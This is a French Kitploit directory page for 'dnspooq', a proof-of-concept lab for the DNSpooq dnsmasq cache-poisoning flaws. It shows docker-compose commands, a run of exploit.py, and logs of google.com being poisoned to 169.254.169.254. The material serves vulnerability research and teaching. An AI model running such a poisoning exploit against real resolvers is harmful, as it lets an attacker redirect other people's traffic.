Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
dnspooq — DNSpooq - empoisonnement du cache dnsmasq (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) | Kitploit
Outils/GitHubGitHub/knqyf263/dnspooq
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationAnalyse DNS
GitHubknqyf263/dnspooq

dnspooq

DNSpooq - empoisonnement du cache dnsmasq (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

Voir le dépôt
10137il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

dnspooq

DNSpooq PoC - empoisonnement du cache dnsmasq (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

À des fins éducatives uniquement

Prérequis

  • Docker compose
  • Docker

Exploitation

dnspooq

Lancement des conteneurs

root@kitploit:~
$ docker-compose up -d

Exécution de exploit.py

root@kitploit:~
$ docker-compose exec attacker bash
bash-5.0# python exploit.py
Interrogation des noms non mis en cache...
Génération de paquets usurpés...
Poisoned: b'google.com.' => 169.254.169.254
3032017 réponses envoyées en 50.309 secondes

Voir la sortie du conteneur forwarder

root@kitploit:~
$ docker-compose logs -f forwarder
...
forwarder_1  | dnsmasq[1]: query[A] example.com from 10.10.0.3
forwarder_1  | dnsmasq[1]: forwarded example.com to 10.10.0.4
forwarder_1  | dnsmasq[1]: cached example.com is <CNAME>
forwarder_1  | dnsmasq[1]: cached google.com is 169.254.169.254

Voir la sortie du conteneur cache

root@kitploit:~
$ docker-compose logs -f cache
Attaching to dnspooq_cache_1
cache_1      | Sniffing...
cache_1      | Source port: 46816, TXID: 16476, Query: b'example.com.'
cache_1      | Source port: 16718, TXID: 54280, Query: b'example.com.'
...
cache_1      | Source port: 46816, TXID: 56240, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 24160, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 18189, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 40361, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 13100, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 47303, Query: b'example.com.'

Références

  • https://www.jsof-tech.com/disclosures/dnspooq/
  • https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq-Technical-WP.pdf

Auteur

Teppei Fukuda

Télécharger l’outil